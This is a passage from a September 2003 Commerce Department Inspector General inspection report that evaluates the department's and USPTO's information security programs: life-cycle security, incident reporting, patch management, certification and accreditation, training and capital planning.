agency CIO\nconcurs are brought before the council.\n\n\n\n\n                                                  15\n\n\x0cU.S. Department of Commerce                                                          Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                             September 2003\n\n\n\n                                                                VII. Steps for Managing Life Cycle\n      Agency head\xe2\x80\x99s efforts to ensure that\n      the information security plan is                               Information Security Are Prescribed in\n      practiced throughout the life cycle of                         the Department\xe2\x80\x99s Policy\n      each system. Specific and direct\n      actions taken by the agency head to                      The Department\xe2\x80\x99s new information security\n      verify that the unit\xe2\x80\x99s program officials\n                                                               policy delineates the requirements for managing\n      and CIO are ensuring that security\n      plans are up-to-date and practiced                       information security throughout the life cycle of\n      throughout the life cycle of each                        each system.\n      system. (OMB Questions B.3 and B.4)\n                                                  The policy identifies five life-cycle phases:\n                                                  (1) initiation, (2) development/acquisition,\n(3) implementation, (4) operation and maintenance, and (5) disposal. Specific information\nsecurity requirements must be met at each phase and are the responsibility of the system owner,\nwith support from the appropriate IT security officer and CIO. Commerce has management and\noversight processes to help ensure that life-cycle information security requirements are adhered\nto at phases 1 through 4, but lacks such an oversight process for phase 5\xe2\x80\x94disposal. (See table 4.)\n\nIn the initiation phase, Commerce requires system owners to (1) obtain identifiers from the\nDepartment CIO that permits systems tracking in the Department-wide inventory, and\n(2) determine the sensitivity level18 of the data processed by the system and the criticality of the\nsystem to the Department\xe2\x80\x99s mission. Responsibilities in the development/acquisition stage\ninclude determining system security requirements; performing a risk assessment; preparing the\nsecurity plan, contingency plan, and test plan; and ensuring security in IT acquisitions. During\nimplementation, certification and accreditation must occur before the system becomes\noperational. In the operation and maintenance phase, the system owner must ensure that the\nsecurity plan is maintained, the contingency plan is updated and tested, vulnerability testing is\nperformed, configuration management is carried out, security controls are periodically assessed,\nsystem logs are examined, and the system is recertified and reaccredited every 3 years. In the\ndisposal phase, the system owner must see that federal records are properly preserved and\narchived, sensitive information is removed, and system components are destroyed or recycled\nappropriately.\n\nUSPTO\n\nUSPTO\xe2\x80\x99s draft policy states that information security is managed throughout a system\xe2\x80\x99s life\ncycle, gives this responsibility primarily to system owners and secondarily to developers, and\nidentifies 6 life-cycle phases: (1) initiation, (2) concept, (3) detailed analysis and design,\n(4) development, (5) deployment, and (6) operations (including disposal). The draft policy does\nnot identify or describe the requirements of each phase, but instead refers for guidance to\nUSPTO\xe2\x80\x99s Life Cycle Management Manual (LCM) and Life Cycle Certification and Accreditation\nChecklist TSG. 19 Both of these documents would be improved by a concise description of life-\ncycle responsibilities so that program officials and system owners clearly understand their life\ncycle information security duties and responsibilities. Such clarification would also facilitate\n\n18\n     Sensitivity levels define the requirements for system confidentiality, integrity, and availability.\n19\n     A TSG is a technical standard or guideline.\n\n                                                              16\n\n\x0cU.S. Department of Commerce                                                         Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                            September 2003\n\n\n\nTable 4. Departmental Management and Oversight Processes That Promote System Life\n         Cycle Information Security\n\n\n    Life-Cycle Phase            Principal Management or                      Areas Addressed by Management and\n                                   Oversight Processes                               Oversight Processes\n                            \xe2\x80\xa2   Inventory identifier request\n                                                                         \xe2\x80\xa2   Tracking of system security status.\n                            \xe2\x80\xa2   CITRB reviews\n                                                                         \xe2\x80\xa2   Whether (a)information security is being\n                            \xe2\x80\xa2   Evaluations by operating unit IT\nInitiation                                                                   planned and funded as part of the system\n                                review boards\n                                                                             architecture, (b) risks are well managed, and\n                            \xe2\x80\xa2   Department and agency CIO                    (c) privacy and confidentiality are being\n                                reviews of capital asset plans               protected.\n\n                            \xe2\x80\xa2   CITRB reviews\n                                                                         \xe2\x80\xa2   Whether (a) information security is being\n                            \xe2\x80\xa2   Evaluations by operating unit IT\nDevelopment/Acquisition                                                      implemented and funded appropriately, (b) risks\n                                review boards\n                                                                             are well managed, and (c) privacy and\n                            \xe2\x80\xa2   Department and agency CIO                    confidentiality are being protected.\n                                reviews of capital asset plans\n\n                                                                         \xe2\x80\xa2   Whether system security safeguards have been\n                                                                             implemented and meet applicable requirements\n                            \xe2\x80\xa2   Certification and accreditation              and specifications.\nImplementation\n                            \xe2\x80\xa2   CIO\xe2\x80\x99s compliance review program          \xe2\x80\xa2   Whether appropriate management official has\n                                                                             formally authorized system operation and has\n                                                                             explicitly accepted any residual risk.\n\n                                                                         \xe2\x80\xa2   Whether system security safeguards are current\n                                                                             and continue to meet applicable requirements\n                            \xe2\x80\xa2   Recertification and reaccreditation at\n                                                                             and specifications.\nOperation and Maintenance       least every 3 years\n                                                                         \xe2\x80\xa2   Whether appropriate management official has\n                            \xe2\x80\xa2   CIO\xe2\x80\x99s compliance review program\n                                                                             formally reauthorized system operation and has\n                                                                             explicitly accepted any residual risk.\n                            \xe2\x80\xa2   None. Disposal requirements are\n                                contained in the Department\xe2\x80\x99s\nDisposal                        information security policy and\n                                security manual, but oversight\n                                processes are not identified.\n\n\n\n\noversight. USPTO\xe2\x80\x99s CIO recognizes that the LCM needs to be streamlined and plans to see that\nit is next fiscal year.\n\nThis past year\xe2\x80\x99s certification testing has identified various areas throughout the system life cycle\nin which policies, procedures, and processes need to be improved. The contractor supporting the\ncertification and accreditation program has been tasked to draft improvements to USPTO\xe2\x80\x99s\ntechnical standards and guidelines to accomplish this. This work is expected to be performed\nearly next fiscal year.\n\nTo help ensure that security policies and procedures are followed through the life cycle of each\nsystem, the draft policy gives the director of the IT Security Program Office responsibility for\nmanaging reviews and inspections that examine (1) effectiveness of security control measures;\n(2) compliance with policies, procedures, standards, and guidelines; and (3) the user\n\n\n                                                           17\n\n\x0cU.S. Department of Commerce                                        Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                           September 2003\n\n\n\ncommunity\xe2\x80\x99s awareness of security and related policies. The draft policy provides guidelines for\nsettling policy violations, and its requirements for certification and accreditation help ensure\nappropriate life cycle system security management.\n\nAnother enforcement action taken by USPTO\xe2\x80\x99s CIO has been to designate an employee in the\nCIO\xe2\x80\x99s Office to act as an internal IT auditor. This employee reports to the Deputy CIO and is\ncharged with performing such tasks as security documentation review and unannounced\npenetration testing of USPTO\xe2\x80\x99s networks and systems. In addition, the IT Security Program\nOffice director\xef\xa3\xa7through USPTO\xe2\x80\x99s change control board\xef\xa3\xa7reviews proposed system changes\nand has the authority to reject change requests that would adversely affect information security.\nFinally, a technical review board appointed by the CIO reviews systems and associated\ninformation security concerns at key milestones.\n\n\n\n\n                                                18\n\n\x0cU.S. Department of Commerce                                       Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                          September 2003\n\n\n\n\nVIII. Information Security and Critical\n      Infrastructure Protection Responsibilities       Integration of information\n      Are Well Integrated, and Coordination            security program with critical\n                                                       infrastructure protection\n      With Other Security Functions Is                 responsibilities and other security\n      Increasing                                       programs (e.g., continuity of\n                                                       operations, and physical and\nCommerce\xe2\x80\x99s critical infrastructure and information     operational security), including\nsecurity programs are under the authority of the       efforts to eliminate unnecessary\nDepartment CIO and are highly integrated. The          overhead costs and ensure that\nprogram manager for critical infrastructure            policies and procedures are\n                                                       consistent and complementary\nprotection (CIP) has responsibilities that require     across programs and disciplines.\nclose coordination with the program manager for        (OMB Questions B.5 and B.6)\ninformation security, such as responsibility for\ncomputer incident response capability (in concert\nwith the Department\xe2\x80\x99s Office of Security and OIG). In turn, the IT security manager gives\npriority to systems considered national critical in compliance reviews of information security.\nThese two program managers cochair the IT Security Coordinating Committee, a forum for\ninformation exchange and action on Department-wide security policies, problems, and potential\nsolutions. A pending reorganization of the Department CIO Office will put the IT security and\nCIP managers under the same senior executive, and thus further solidify their partnership and\ninterface.\n\nBecause Commerce has complied with the Clinger-Cohen Act requirement that the CIO report to\nthe agency head and have IT as his primary responsibility, the Department necessarily has\nseparate staffs to carry out other security functions. These functions\xe2\x80\x94continuity of operations\nplanning, physical security, and personnel security\xe2\x80\x94come under the authority of the CFO.\nThe Department\xe2\x80\x99s information security policy delineates partnerships that must be maintained by\nthe CIO Office with offices under the CFO, including the Office of Security (OSY), OHRM, and\nOAM.\n\nThe CIO is currently working with these offices to ensure that IT personnel have appropriate\nsuitability checks and background investigations before they are given access to Commerce\nsystems, and to require that positions for network and system administrators, system developers,\nand information security program personnel, such as IT security officers and IT security\nmanagers, are designated as high risk. The CIO is responsible for the IT component of the\ncontinuity of operations plan, and thus works on the plan with the CFO\xe2\x80\x99s office. At present,\nemphasis is on ensuring there are backup sites for the Office of the Secretary and that the IT\nbackup is tested. The Department CIO reports that the IT portions of the operating units\xe2\x80\x99\ncontinuity of operations plans have been maturing, and he intends to review them in FY 2004.\n\nAs we have reported previously, the CIO Office, OSY, and OIG entered into a memorandum of\nagreement (MOA) in FY 2001 to define their respective roles and responsibilities relating to the\ndevelopment, implementation, and management of Commerce\xe2\x80\x99s information security program.\nThis agreement was intended to promote a partnership among the three offices that both\nguarantees complete coverage of information security matters and prevents wasteful duplication\n\n\n                                               19\n\n\x0cU.S. Department of Commerce                                       Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                          September 2003\n\n\n\nof effort. However, the MOA was scheduled to expire in November 2002, with the sunset of\nGISRA. These offices plan to modify the MOA and renew it in FY 2004.\n\nUSPTO\n\nThe agency\xe2\x80\x99s draft policy addresses coordination and cooperation between information security\nand other security programs. The director of the CIO\xe2\x80\x99s IT Security Program Office is\nresponsible for coordinating matters of physical security for IT resources with the USPTO\nphysical security office. USPTO\xe2\x80\x99s Office of Human Resources must inform new employees\nabout the agency\xe2\x80\x99s information security practices, assist managers with disciplinary actions for\npolicy violations, and notify the CIO Office of new and departing employees for account\nmanagement purposes. The CIO Office works with the physical security office on the\ninformation security portion of USPTO\xe2\x80\x99s continuity of operations plan.\n\n\n\n\n                                               20\n\n\x0cU.S. Department of Commerce                                                       Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                          September 2003\n\n\n\n\n                                                        IX. National- and Mission-Critical Asset\nAgency\xe2\x80\x99s identification of its critical\noperations and assets (both national                        Identification Efforts Continue to Be\ncritical and mission critical) and the                      Refined\ninterdependencies and\ninterrelationships of those operations        The Department has identified its national-critical\nand assets. (OMB Question B.7)                assets, and continues to update and refine this\n                                              inventory. Using the Project Matrix methodology,20\n                                              the Critical Infrastructure Assurance Office (CIAO)\nhad helped Commerce identify national-critical assets, and was also supporting an assessment of\ninterdependencies. However, since the CIAO\xe2\x80\x99s move from Commerce to the Department of\nHomeland Security during this fiscal year, efforts to complete the assessment have ceased.\nDepartment officials told us that the Project Matrix methodology has been abandoned by the\nCIAO and a new methodology is being developed. As noted previously, USPTO has no\nnational-critical systems.\n\nThe Department and USPTO have identified their mission-critical assets, and continue to refine\nthis inventory, as well. To the extent that security plans for these systems follow NIST guidance,\nthey identify direct interconnections with other systems for information sharing. As the\nDepartment and USPTO define and document their enterprise architectures\xef\xa3\xa7which show the\nrelationship between business functions and the technologies and information that support\nthem\xef\xa3\xa7 they should identify interrelationships of mission-critical systems.\n\n\n\n\n20\n  Project Matrix has been used to determine the assets and transportation/transmission links essential to meeting\nresponsibilities of the federal government that are deemed \xe2\x80\x9ccritical\xe2\x80\x9d\xe2\x80\x93that is, their incapacitation could jeopardize\nthe nation\xe2\x80\x99s security, seriously disrupt the functioning of the national economy, or adversely affect the health or\nsafety of large segments of the American public. The methodology involves a two-step process in which each\ncivilian federal department and agency identifies (1) its nationally critical functions and services, and (2) the assets\nand links required to perform or provide them.\n\n\n                                                           21\n\n\x0cU.S. Department of Commerce                                                    Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                       September 2003\n\n\n\n\nX. The Department\xe2\x80\x99s Information Security                         How agency head ensures that the\n   Policy Has Requirements for Documenting                       agency and all its components have\n   Incident Reporting Procedures                                 documented procedures for reporting\n                                                                 security incidents and sharing\nFISMA requires agencies to have documented \n                     information regarding common\n                                                                 vulnerabilities. (OMB Question B.8)\nprocedures for detecting, reporting, and \n\nresponding to security incidents, including steps \n\nfor notifying and consulting with the Federal Computer Incident Response Center (FedCIRC), \n\nappropriate law enforcement agencies, and relevant OIGs when incidents occur. It also requires \n\nagencies to ensure compliance with minimally acceptable system configuration requirements. \n\nAccording to OMB, this provision encompasses traditional system configuration management, \n\nemploying clearly defined system security settings and maintaining up-to-date patches21. \n\n\nIncident Handling and Reporting\n\nOur first independent evaluation in FY 2001 found that only 4 of the Department\xe2\x80\x99s 14 operating\nunits\xef\xa3\xa7Census, NOAA, NIST, and USPTO\xef\xa3\xa7had established a computer incident response team\n(CIRT). Last fiscal year, Commerce expanded coverage throughout the Department by creating\nthe DOC CIRT to provide operating units that do not have their own CIRT with an incident\nresponse capability. The DOC CIRT is also intended to serve as a focal point for disseminating\nbest practices and incident response methodologies to all Commerce CIRTs.\n\nThe Department\xe2\x80\x99s information security policy defines the types of incidents that need to be\nreported, sets minimum requirements for incident response capabilities, and prescribes the\nsystem-level processes and incident-handling procedures to be performed, including reporting\nincidents to FedCIRC. It establishes requirements for monitoring and detecting incidents,\nincluding use of network- and host-based intrusion detection systems, logging tools, firewalls,\nand other devices, as well as review of audit logs, trouble reports, and information provided by\nintrusion detection tools. Finally, it requires each operating unit to submit its response\nprocedures to Commerce\xe2\x80\x99s CIP program manager for review and approval\xe2\x80\x94action that will\nensure all units have documented procedures for reporting security incidents and sharing\ninformation about common vulnerabilities.\n\nAccording to the policy, all DOC system users and system and network administrators are to\nreport incidents to the operating unit\xe2\x80\x99s designated CIRT. The team, in turn, must complete an\nincident report and forward it to the DOC CIRT in a secure manner such as by encrypted\ntransmission. Preliminary reporting must occur within 24 hours of the event\xe2\x80\x99s discovery, after\nwhich the CIRT has 5 working days to submit a complete and detailed report to the DOC CIRT.\nThe policy requires operating unit CIRTs to report incidents to FedCIRC and send an\ninformational copy of the report to the DOC CIRT. It makes the DOC CIRT responsible for\nreporting incidents to FedCIRC for those units that do not have their own response teams.\nHowever, it does not specify a timeframe within which FedCIRC must be notified.\n\n\n21\n  A patch is object code (code produced by a compiler) that is inserted into an executable program to temporarily fix\na program error or security issue.\n\n                                                         22\n\n\x0cU.S. Department of Commerce                                        Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                           September 2003\n\n\n\nThe MOA between OIG, CIO, and OSY further delineates roles, responsibilities, and procedures\nfor reporting incidents to OIG and external law enforcement. To ensure these procedures are\nfollowed, they need to be incorporated into or referenced by the Department\xe2\x80\x99s information\nsecurity policy after the new MOA is completed.\n\nConfiguration requirements\n\nThe Department\xe2\x80\x99s policy requires system owners to establish procedures for configuration\nmanagement of all general support systems and major applications. System security plans must\ndescribe how changes to the system or application will be authorized, controlled, tested, and\nimplemented. However, with the exception of certain specific requirements for perimeter\nsecurity devices and firewalls contained in the information security policy, the Department has\nnot developed specific configuration requirements or defined system security settings. Several\nof the operating units we reviewed\xe2\x80\x94ITA, NIST, and NOAA\xe2\x80\x94told us that they have provided\nconfiguration requirements for specific products based on NIST or National Security Agency\n(NSA) guidance.\n\nThe Department\xe2\x80\x99s policy requires each operating unit IT security officer to have a process and\ndocumented procedures in place to identify, track, and report on security patch management. It\nstipulates that operating units centralize patch management leadership so that timely attention is\ngiven to patches for all systems and duplication of patch management functions is minimized.\n\nThe operating units we assessed\xe2\x80\x94Census, ITA, NIST, and NOAA\xe2\x80\x94have manual patch\nmanagement processes; however, most are seeking to automate at least some portions of the\nprocess.\n\nFedCIRC provides the web-enabled Patch Authentication and Distribution Capability (PADC), a\nfree, secure source of validated patches. PADC notifies users about new threats or\nvulnerabilities that could disrupt federal government systems and networks and provides patches\nthat have been verified as secure and able to eliminate the intended vulnerability. This service is\nvaluable because patches must otherwise be downloaded from Internet sites, some of which have\nbeen attacked by hackers who have corrupted the patches with malicious code. Commerce has\naccess to PADC, but is just beginning to use it. According to the Department CIO, Commerce\nwill rely on PADC for notification of threats and for tested patches.\n\nUSPTO\n\nIncident Handling and Reporting\n\nUSPTO has draft incident response procedures, which it intends to finalize by the end of the\nfiscal year. The procedures are detailed and specific, but do not address a timeframe for\nreporting incidents to FedCIRC or notification of OIG when an incident occurs. The director of\nthe IT Security Program Office told us that modifications will be made to address these\nomissions before the procedures are finalized.\n\n\n\n\n                                                23\n\n\x0cU.S. Department of Commerce                                         Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                            September 2003\n\n\n\n\nConfiguration requirements\n\nUSPTO officials told us that while the agency has configuration requirements, its certification\nactivities found that the settings could not be traced to an authoritative source such as NIST or\nNSA. USPTO plans to implement the vendor recommended security settings.\n\nUSPTO has a patch management policy and procedures, has an automated tool to deploy patches\nand monitor their application, and is a PADC user. According to the director of the IT Security\nProgram Office, IT personnel can view the status of patches on all servers and all but one\noperating system, and will soon be able to view the status of patches on that remaining system as\nwell. However, certification testing found that appropriate security settings and patches are not\nalways implemented. USPTO reports that five IT staff members are registered users of PADC.\n\n\n\n\n                                                24\n\n\x0cU.S. Department of Commerce                                                     Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                        September 2003\n\n\n\nResponsibilities of Program Officials\nand Chief Information Officers\n\n     Risk assessments, security level\n                                                           XI. The Department\xe2\x80\x99s Risk Assessments,\n     determinations, security plans, and                       Security Plans, and Testing of Security\n     security control testing and evaluation.                  Controls Continue to Need Serious\n     (OMB Question C.1)                                        Attention\n\n                                                  FISMA assigns senior agency officials and the\nCIO responsibility for assessing the information security risks for programs and systems over\nwhich they have control, determining the levels of information security appropriate to protect\nassociated operations and assets, and periodically testing and evaluating information security\ncontrols and techniques. In turn, the Department\xe2\x80\x99s policy has charged all operating unit officials\nand CIOs with these same responsibilities in their organizations.\n\nIn last year\xe2\x80\x99s independent evaluation, we found numerous systems operating without required\nrisk assessments or approved security plans. Some that had approved security plans provided no\nevidence that risk analysis\xe2\x80\x94a prerequisite for the security plan\xe2\x80\x94had been conducted. Most\noperational systems had not been certified and accredited, and those that were frequently lacked\nevidence that the requisite security testing and evaluation had been performed. As noted\npreviously, the Department CIO set September 30, 2003, as the deadline for having all national-\ncritical and mission-critical systems certified and accredited.\n\nIn June 2003, we requested certification and accreditation materials, including risk assessments,\nsecurity plans, contingency plans, and security test and evaluation materials (test procedures and\nresults) for a range of systems we selected throughout the Department. As shown in table 5, our\nreview of these materials for 37 systems in 6 operating units (including 5 NOAA line offices)\nfound serious deficiencies in the content and quality of the risk assessments and plans. We\nfound many risk assessments and security plans that did not provide essential information for\ndetermining appropriate system security controls, and still others whose information was\ninaccurate or inconsistent. We also found that the certifications were frequently granted without\ncareful review of the documentation and without testing, and thus did not identify residual\nrisks.22 Without reliable documentation and certifications, accrediting officials lack sufficient\ninformation for making informed decisions about whether a system\xe2\x80\x99s residual risks are\nacceptable and accreditation is therefore desirable. (Through accreditation, the DAA is explicitly\naccepting the residual risks; therefore, these risks must be clearly identified.)\n\nIn cases where testing was conducted, it was usually in the form of vulnerability scans,23 which,\nwhile a useful part of the testing process and required annually by the Department\xe2\x80\x99s policy, do\nnot adequately cover security controls for certification purposes for any but low-risk systems.\nCertification test and evaluation should include such measures as penetration testing, observation\nof how controls are implemented, document review, and interviews.\n\n22\n   Residual risks are the risks remaining after appropriate security controls have been applied to the information \n\nsystem. \n\n23\n   Vulnerability scans use automated tools to identify vulnerabilities of computing systems in a network in order to\n\ndetermine whether and where a system can be exploited or threatened. \n\n\n                                                          25\n\n\x0cU.S. Department of Commerce                                          Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                             September 2003\n\n\n\n\nThe deficiencies we identified affected systems controlled by program officials as well as by\noperating unit CIOs. Details of our evaluation criteria and results for each operating unit that we\nassessed are presented in Appendix A. We recognize that a number of Commerce systems,\nincluding ones that we reviewed, are undergoing recertifications and reaccreditations, which are\nscheduled to be completed by September 30, to comply with the new information security policy.\nAccording to the Department CIO, improvements are being made as part of this process that\nshould correct a number of the problems we identified with the current accreditations.\n\n             Table 5: \tSummary of OIG Evaluation of Commerce Certification and\n                       Accreditation Materials*\n\n                                                                            OIG\n                                           Criteria\n                                                                          Evaluation\n              Number of systems reviewed                                      37\n\n              Number of systems certified and accredited                      30\n\n              Number of systems certified and accredited with\n                                                                               0\n              adequate testing\n\n              Number of systems certified and accredited with\n                                                                               0\n              residual risks identified\n\n              Number of risk assessments that provide a sufficient\n                                                                              11\n              basis for identifying security controls\n\n              Number of security plans that adequately:\n\n              --Describe applications/data/data flow                           7\n\n              --Identify interconnections                                     15\n\n              --Provide support for assigned sensitivity levels                9\n\n              Number of contingency plans that adequately:\n\n              --Identify alternate sites                                      14\n\n              --Describe backup procedures                                    28\n\n              --Describe system restoration procedures                         7\n\n\n*Assessment covered systems in the following operating units: BEA, BIS, Census, NIST, NTIS, and\n NOAA (NESDIS, NMFS, NOS, NWS, and OAR).\n\n\n\n\n                                                      26\n\x0cU.S. Department of Commerce                                       Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                          September 2003\n\n\n\n                                                  XII. \t USPTO Is Making Significant\n  Risk assessments, security level\n  determinations, security plans, and                    Improvements to Risk Assessments,\n  security control testing and evaluation.               Security Plans, and Testing of\n  (OMB Question C.1)                                     Security Controls\n\n                                                   Based on the materials that we reviewed for\nUSPTO\xe2\x80\x99s one certified and accredited system, it is evident that the agency has made an\nextremely conscientious effort to employ a disciplined process using the NIACAP standard.\nThis system had a thorough risk assessment and comprehensive security and contingency plans.\nCertification included extensive testing of security controls that identified weaknesses in the\nsystem itself, as well as organization-wide security issues. We note, however, that the security\nplan only provided examples of interconnections with other systems, rather than identifying all\ninterconnections, as directed by NIST guidance. Overall, USPTO has a sound approach, which it\nappears to be using for certifying and accrediting its remaining systems.\n\nAs we discussed previously, of the 10 systems scheduled to be certified and accredited this fiscal\nyear, 1 has been fully accredited and 5 had been granted interim accreditations. USPTO expects\nthe remaining 4 systems to receive interim accreditations by the September 30 deadline. The\nagency\xe2\x80\x99s interim accreditations require comprehensive risk assessments, security plans, and\ntesting of security controls. As USPTO corrects the problems identified by means of its\ncertification and accreditation process, its systems will be appreciably more secure.\n\n\n\n\n                                                27\n\n\x0cU.S. Department of Commerce                                        Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                           September 2003\n\n\n\n\nXIII. The Department CIO Continues to                 The agency CIO\xe2\x80\x99s ability to\n      Make Progress in Improving                      adequately maintain an agencywide\n      Information Security Throughout                 information security program, ensure\n                                                      effective implementation of the\n      Commerce\n                                                      program, and evaluate the\n                                                      performance of major agency\nOver the past several years, the Department           components. (OMB Question C.2)\nCIO has focused intensely on improving\ninformation security and has made significant\nstrides. In finalizing the new information\nsecurity policy this past January, he gave Commerce a comprehensive blueprint for securing\nagency information systems that complies with the minimum requirements for security programs\nset forth in OMB Circular A-130: namely, that each system have (1) a knowledgeable Commerce\nofficial assigned responsibility for its security, (2) a risk assessment and security plan, (3) a\nperiodic review of its security controls, and (4) authorization to operate (certification and\naccreditation). As required by FISMA, the CIO has designated a senior officer for information\nsecurity.\n\nThe Department CIO is making a determined effort to effectively implement the security\nprogram, though much remains to be done\xef\xa3\xa7especially in the areas of assessing risk, determining\nappropriate security controls, testing and evaluating these controls, and certifying and accrediting\nsystems. But satisfying the demands of information security law, policy, and guidance requires\nsubstantial change in the culture of an organization that, until recently, has given scant attention\nto this area. Thus, it remains a considerable challenge to ensure that program and IT officials\nthroughout the Department understand and accept their information security responsibilities and\nthat personnel with specialized information security roles continually increase their knowledge\nand skills to address a technically complex and constantly changing security environment.\n\nThe Department CIO\xe2\x80\x99s Office has initiated a compliance review program to evaluate the\nperformance of all Commerce operating units by validating the security information they report\nand assessing the effectiveness of their information security programs. As noted previously, the\nCIO intends to review all systems over a 3-year cycle. The fiscal year 2003 review has three\nobjectives: (1) validate the system inventory, (2) inspect the quality of certification and\naccreditation packages for all classified, national-critical, and mission-critical systems in the\ninventory as of March 2003, and (3) verify implementation of corrective actions to resolve the\nrecommendations from GAO reports issued in August 2001 and January 2002. The Department\nCIO Office\xe2\x80\x99s management and oversight of the POA&M process is an additional means by\nwhich it evaluates operating unit performance.\n\nUSPTO\n\nLast fiscal year, USPTO\xe2\x80\x99s newly appointed CIO began giving serious attention to improving\ninformation security and establishing and maintaining an agencywide information security\nprogram, and excellent progress has been made as a result. USPTO\xe2\x80\x99s information security\npolicies, when refined and finalized, should address the basic security program requirements of\nOMB Circular A-130 that each system have a knowledgeable USPTO official assigned\n\n\n                                                28\n\n\x0cU.S. Department of Commerce                                        Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                           September 2003\n\n\n\nresponsibility for its security, a risk assessment and security plan, a periodic review of its\nsecurity controls, and certification and accreditation. As required by FISMA, a senior agency\ninformation security officer has been designated by USPTO\xe2\x80\x99s CIO. And as we have discussed\npreviously, USPTO is well on its way to certifying and accrediting all of its mission-critical\nsystems and is using sound processes to do so.\n\nLike the rest of the Department, effectively implementing the stipulated information security\nprogram requires significant cultural change. USPTO\xe2\x80\x99s CIO is currently working with program\nofficials to facilitate their understanding and acceptance of their more active role and increased\naccountability before the policy is finalized. We believe that the CIO\xe2\x80\x99s effort is essential to\ninitiating and maintaining an efficacious information security program.\n\nThe ongoing certification and accreditation efforts, the POA&M process, and the work of the\ninternal IT auditor (i.e., unannounced penetration testing of networks and systems and review of\nsecurity documentation) are the principal means by which its major components are currently\nbeing evaluated. The Department intends to assess USPTO as part of its compliance review,\nwhich will provide an additional means of evaluation.\n\n\n\n\n                                                29\n\n\x0cU.S. Department of Commerce                                                  Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                     September 2003\n\n\n\n\n                                                      XIV. Information Security Awareness Training\n         The agency CIO\xe2\x80\x99s efforts to\n         ensure that all agency\n                                                           Is Being Addressed, but Specialized\n         employees, including                              Training Requirements Are Needed\n         contractors and those\n         employees with significant            The Department\xe2\x80\x99s new policy requires each\n         information security                  operating unit\xe2\x80\x99s information security program to\n         responsibilities, are aware of        include an awareness, training, and education\n         and trained in information            component for all employees and contractors, remote\n         security policies and practices.\n         (OMB Question C.3)\n                                               researchers and collaborators working on Commerce\n                                               projects, and temporary guest system users. New\n                                               employees and contractors must receive awareness\ntraining within 30 days of hire and prior to using any IT resource. All existing employees and\ncontractors who have access to systems containing sensitive information are required to have\nannual refresher training. Operating units must maintain a tracking system that identifies those\ntrained, and the type and date of training taken.\n\nDepartment and operating unit officials told us that security awareness training is provided\nannually for all employees and contractor personnel. During this fiscal year, the CIO enhanced\nand disseminated its awareness training for new employees and acquired an enterprise license for\nweb-based information security training, which has recently made awareness refresher training\ncustomized for Commerce available at no charge to Commerce employees and contractors. This\ntraining is provided by the Gov Online Learning Center (referred to as GOLearn).24\n\nSpecialized training. Under the Department\xe2\x80\x99s policy, operating units must identify positions that\nrequire specialized training as well as the specific requirements of that training. We found limited\nprogress in this area. Training for personnel with significant information security responsibilities,\nsuch as system administrators, IT security officers, and contracting officers, appeared to be\ninconsistent and incomplete at the units we reviewed. The Department has been attempting to\nestablish more uniform requirements or guidance for specialized training, but progress here has\nbeen slow. A working group convened in FY 2001 to address specialized training helped develop\nthe Department\xe2\x80\x99s training policy and conducted a needs assessment, but has not defined\nrequirements for specialized training. In the meantime, the Department CIO is making training\nmore accessible: the recently acquired enterprise license will make specialized training available\nthroughout Commerce at a nominal cost. The approximately 60 GOLearn courses are mapped to\nvarious positions identified in NIST Special Publication 800-16, Information Technology Security\nTraining Requirements: A Role- and Performance-Based Model. One area that is progressing is\ntraining of procurement personnel. As discussed in Finding I, OAM has developed security\ntraining for these personnel, which is undergoing review.\n\nIn conducting our independent evaluation this year, we found that some IT security officers and\nsystem administrators still do not sufficiently understand their duties and responsibilities. We\nalso found a pervasive lack of understanding of the objectives and requirements of system risk\n\n24\n     The Gov Online Learning Center offers web-based training to federal employees.\n\n\n\n                                                         30\n\n\x0cU.S. Department of Commerce                                      Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                         September 2003\n\n\n\nassessment, security planning, contingency planning, and certification and accreditation. These\nfindings highlight the importance of ensuring that specialized security training is provided to\nthose who need it.\n\nUSPTO\n\nUSPTO is using GOLearn through the Department\xe2\x80\x99s enterprise license to provide the mandated\nannual awareness refresher training in information security awareness, and also requires\nawareness training for new employees and contractors. USPTO has not yet established\nrequirements for specialized training and is using NIST training guidance to do so. In the\nmeantime, USPTO executives have received specialized training in information security,\nincluding certification and accreditation, and CIO managers and staff have been trained on\nUSPTO\xe2\x80\x99s IT processes and related information security procedures, as have some program,\nadministrative, and contractor employees. USPTO plans to implement specialized training for\napproximately 150 employees and contractors, also via GOLearn. As noted, these courses are\nmapped to various positions identified in NIST guidance.\n\n\n\n\n                                               31\n\n\x0cU.S. Department of Commerce                                          Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                             September 2003\n\n\n\n\nXV. \tIntegration of Security into the Capital                Agency CIO\xe2\x80\x99s efforts to fully\n     Planning and Investment Control Process Is              integrate security into the capital\n     Improving                                               planning and investment control\n                                                             process. (OMB Question C.4)\nOur review of capital asset plans last year revealed\nthat the operating units need to do a better job of\nidentifying security risks and controls in their capital asset plan so as to improve and better justify\nprojections of security expenditures. This year, we reviewed FY 2004 plans for BIS, NESDIS,\nNOS, NWS, and NTIA (FY 2005 plans were not available when we conducted our fieldwork) and\nnoted that in general, they contained more specific information on security requirements and how\nthey are addressed. Some, however, still contained generic discussions of security requirements\nand controls, and one plan was ambiguous about whether the system had been certified and\naccredited. All of the plans stated that the system\xe2\x80\x99s security controls had been tested, but few\ndescribed the test methodology. Our review of security materials, as noted in Finding XI, found\nlittle if any testing of security controls for most systems beyond self assessments.\n\nUSPTO\n\nWe reported last year that USPTO had not identified security costs for any individual system in\nits FY 2002 or FY 2003 budget submissions. In this year\xe2\x80\x99s review, we found that capital asset\nplans prepared for the FY 2004 submission comprehensively addressed the areas required by\nOMB and thus demonstrate a serious effort by USPTO to include information security in its\ncapital asset planning.\n\n\n\n\n                                                  32\n\n\x0cU.S. Department of Commerce                                       Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                          September 